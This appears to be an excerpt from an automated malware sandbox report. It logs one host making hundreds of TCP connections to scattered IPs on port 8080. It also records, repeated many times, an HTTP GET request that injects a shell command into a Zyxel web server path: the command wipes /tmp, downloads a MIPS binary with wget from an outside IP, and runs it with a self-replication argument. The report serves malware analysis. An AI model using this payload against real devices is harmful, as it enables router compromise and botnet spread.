      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 191.221.230.238:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 86.25.4.244:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 211.246.253.214:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 162.115.142.64:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 118.127.255.230:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 104.223.195.148:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 147.107.209.130:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 9.21.206.185:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 23.147.143.232:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 95.112.65.88:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 155.47.173.176:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.133.19.252:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 52.187.177.194:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 13.138.237.71:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 74.88.32.223:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 167.68.192.209:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 147.214.122.64:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 203.107.162.251:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 99.170.57.98:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 115.100.140.156:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 194.221.237.206:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 161.12.94.124:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.95.95.1:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.252.92.79:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 121.44.146.194:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 140.39.95.230:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 60.191.241.225:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 123.104.228.212:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 119.141.59.162:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 182.71.173.43:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 130.69.80.104:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 32.122.79.179:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 78.19.212.171:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 193.208.97.92:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 145.121.103.67:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 53.174.228.240:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 194.231.194.226:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 169.126.128.97:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 78.29.30.176:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 159.172.77.239:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 62.251.103.13:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 110.19.241.55:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 13.161.199.211:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 186.172.125.93:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 68.14.204.74:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.34.236.74:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 218.132.207.90:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 94.200.142.172:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 181.194.141.185:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 68.38.28.76:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 43.164.229.181:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 118.248.224.228:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 193.21.116.55:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 61.227.247.238:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.76.238.186:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 120.146.216.14:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 206.68.155.195:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 150.91.132.120:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 101.39.203.175:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 88.45.72.109:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 36.250.153.31:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 210.249.22.222:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 54.253.133.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 48.66.242.101:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 83.15.9.34:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 37.248.205.16:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 194.208.191.183:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 195.20.213.83:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.11.92.192:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 82.97.5.33:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 126.157.250.239:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 54.179.238.87:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 154.159.125.121:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 122.55.245.92:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 99.21.113.166:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 52.172.142.18:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 142.247.57.27:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 52.160.209.125:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 182.77.113.195:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 185.129.250.229:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 147.153.8.109:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 70.159.74.155:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 200.108.238.199:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 45.233.162.179:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 74.230.212.160:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 198.52.25.132:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 102.134.50.197:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 8.132.198.105:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 177.247.86.164:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 128.62.66.177:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 179.217.38.253:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 120.76.133.200:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 211.85.128.26:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 187.68.17.211:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 19.14.249.209:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 45.130.36.5:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 27.201.223.188:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 17.196.46.117:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 13.96.38.86:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 220.62.98.210:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 130.154.227.34:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 34.85.159.144:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.249.223.227:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 66.99.30.61:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 184.231.163.50:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 204.126.186.187:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 113.70.212.47:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 188.50.98.113:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 46.47.162.122:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 182.249.52.106:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 24.35.197.64:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 32.250.11.139:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 200.79.241.29:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 92.173.253.54:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 202.136.104.21:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 140.202.254.94:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 189.42.164.60:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 175.219.24.194:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 48.105.93.103:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 18.24.172.196:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 176.74.119.95:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 128.116.196.233:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 114.9.140.10:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 79.82.50.227:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 160.164.218.45:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.186.222.208:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 81.31.74.183:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 5.40.174.228:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 41.99.87.183:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 114.134.252.38:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 177.149.97.57:8080
      Source: global trafficTCP traffic: 192.168.2.13:57802 -> 45.152.86.86:56789
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 142.242.181.129:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 72.231.177.157:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 213.234.122.45:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 4.54.45.135:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 122.137.151.103:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 146.181.46.102:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 40.172.34.122:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 142.100.70.100:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 70.66.17.89:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 158.129.137.0:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 64.232.241.86:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 63.247.218.212:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 74.29.62.250:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 161.73.195.171:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 59.80.123.249:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 81.23.91.169:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 105.251.72.127:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 95.113.193.92:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 24.216.136.85:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 105.119.152.29:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 94.230.96.0:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 42.185.120.128:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 175.71.1.181:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 45.249.25.166:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 142.236.178.144:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 85.152.132.119:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 73.250.156.88:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 185.20.60.232:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 131.175.241.101:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 155.60.53.218:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 221.13.17.153:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 97.129.248.198:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 185.62.84.16:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 8.121.36.188:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 81.185.84.140:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 207.164.176.222:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 31.68.222.175:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 103.101.161.174:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 194.215.113.59:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 207.212.69.233:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 181.221.249.159:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 61.31.189.250:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 125.63.156.102:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 1.115.142.189:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 68.16.186.60:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 12.98.42.77:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 12.205.71.1:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.197.178.163:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 79.174.40.51:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 188.114.215.186:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 124.54.76.169:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.205.195.186:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 147.2.101.112:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 205.188.183.249:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 119.66.183.165:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 182.52.78.5:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 162.157.97.195:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 182.75.191.204:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.199.60.43:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 49.228.129.229:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 37.179.234.68:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 217.191.217.181:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 69.29.119.50:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 60.83.145.16:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 68.143.226.164:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 102.232.116.130:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 75.126.31.29:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 17.161.172.125:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 119.18.24.92:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 61.238.165.207:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 161.98.61.168:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 135.166.40.241:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 183.63.218.13:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 179.49.28.84:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 162.40.111.16:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 129.115.40.109:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 50.25.180.75:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 169.48.69.187:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 154.146.161.66:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 176.137.61.67:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 198.134.102.30:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 157.199.78.233:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 73.79.244.254:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 171.33.173.60:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 25.161.36.11:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 49.72.168.103:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 86.15.126.81:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 155.168.46.230:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 97.96.133.163:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 143.173.104.47:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 52.57.247.28:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.132.211.128:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 71.157.81.203:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 103.218.14.37:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 123.1.143.184:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 223.117.134.0:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 222.142.210.23:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 50.117.35.232:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 23.0.103.175:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 220.223.89.8:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 219.77.111.202:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 98.6.223.79:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 160.44.157.176:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 177.83.140.221:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 43.187.183.204:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 38.65.7.81:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 14.249.138.152:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 195.101.86.21:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 204.239.159.5:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 13.252.18.190:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 134.233.56.83:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 51.3.101.228:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 149.6.196.164:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 154.235.171.225:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 189.238.215.173:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 101.99.192.6:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 191.45.55.24:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 95.100.56.19:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 91.197.131.167:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 202.125.201.132:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.137.227.135:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 143.246.47.26:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 60.75.96.128:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 69.74.82.38:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 9.168.46.87:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 216.37.42.198:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 78.42.172.209:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.46.172.53:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 211.231.224.21:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 83.73.236.248:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 91.24.206.166:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 221.174.79.240:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 46.66.238.24:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 116.248.50.188:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 118.249.41.8:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 1.50.35.246:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.159.36.115:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 217.238.105.120:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 64.22.173.183:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 122.47.184.231:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 68.203.141.25:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 139.175.32.109:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 174.86.120.193:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 218.170.100.178:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 71.146.231.206:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 93.133.119.25:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 135.182.164.151:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 195.114.92.213:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 41.14.50.52:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 140.32.165.242:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 53.150.143.104:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 173.134.115.157:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 106.135.38.33:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 210.35.117.1:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 66.97.12.171:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 99.250.116.178:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 138.255.225.169:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 213.33.60.225:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 209.73.174.167:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 8.124.32.147:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 199.255.37.93:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.147.147.151:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 144.71.45.60:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.31.93.80:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 122.231.138.71:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 126.111.99.161:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 19.17.75.213:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 190.185.61.152:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 104.49.23.54:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 148.115.125.201:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 99.19.23.169:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 219.191.41.163:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 165.57.55.168:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 190.177.245.44:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 222.54.224.92:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 154.30.135.145:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 213.96.23.229:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 31.96.169.187:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 103.231.151.176:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 31.229.12.155:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 190.37.82.249:8080
      Source: global trafficTCP traffic: 192.168.2.13:51169 -> 173.75.110.103:8080
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
